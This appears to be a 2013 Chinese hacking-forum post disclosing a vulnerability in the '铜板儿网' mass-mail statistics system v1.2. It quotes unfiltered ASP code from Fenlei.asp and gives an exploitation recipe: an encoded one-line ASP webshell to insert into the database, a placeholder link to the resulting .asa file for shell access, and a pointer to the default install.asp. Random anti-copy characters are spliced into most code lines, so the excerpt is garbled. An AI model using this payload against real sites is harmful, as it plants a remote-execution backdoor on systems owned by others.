找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2131|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
% l  _! o5 W. j( K% f! `, I0 m' j# |, r
IF Request.QueryString("Action")="del" Then # j# Z: _# k2 }1 _& j
ID=Request.QueryString("ID")
' q+ k) J) y6 T9 m; H1 H4 ~IF Countss ("tui","Fenlei",ID )<>0 then
+ a8 {7 y1 e7 m  a" g'略
: W  h! x  b* W9 K8 g/ F# a& UIF Request.QueryString("Action")="Add" Then ; }) ?* u4 J) a) H/ t- [
Tname=Request.Form("Typename")
  x' @+ u6 I+ k. S0 B0 _2 B! l1 GSet Rs=Server.CreateObject("adodb.Recordset") # `" M2 P5 o) M! E. B
Sql="Select * From Fenlei Order by id Desc " 4 v, N8 Q% m3 o- }4 I& w
Rs.Open Sql,Conn,1,3 ! e0 `, ]) C8 ~) _. Q- d8 d% P( @1 U
Rs.Addnew ! f- M. h& O; n" s6 N
Rs("Typename")=Tname
7 T! l! j4 o. Y8 S$ ['略
6 `9 O0 }# d$ f0 n' F+ \Set Rs=Server.CreateObject("adodb.Recordset")
1 _0 r0 @: \7 dSql="Select * From Fenlei Order by id Desc " ) u8 s! O2 _& z3 r8 J, d) o' _0 e
Rs.Open Sql,Conn,1,1
9 V! f' _% l' h'略 % p5 l. \3 @8 ]
%>
$ ~1 X- H6 u3 C  m% e  c) @ 2 A" r3 y3 e- }" t# U: L
+ f* I' w3 Q2 n: G  k
0 O% P: J% H$ u4 ~! i9 ~, a
没有过滤,直接写入数据库。  ~5 D9 K9 H2 H/ H
2 f% l( ~) ]9 F8 X* ^
利用方法:
  _' m# g# H3 I' [0 N9 N! {
1 Q( ^9 N3 w7 Y& x插入:┼攠數畣整爠煥敵瑳∨≡┩>
/ L3 n6 q* W# V % g# Y( P3 W$ k* j* i

: r+ d/ A- F9 s" Y连接: http://www.xxx.com/###tongbaner.asa
7 s& B) G8 V0 ]/ S'默认安装文件:
: {9 l" |7 l: t7 l9 g, b2 }+ J'install.asp7 w* k  q% ]! ]6 ^: t8 b' d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表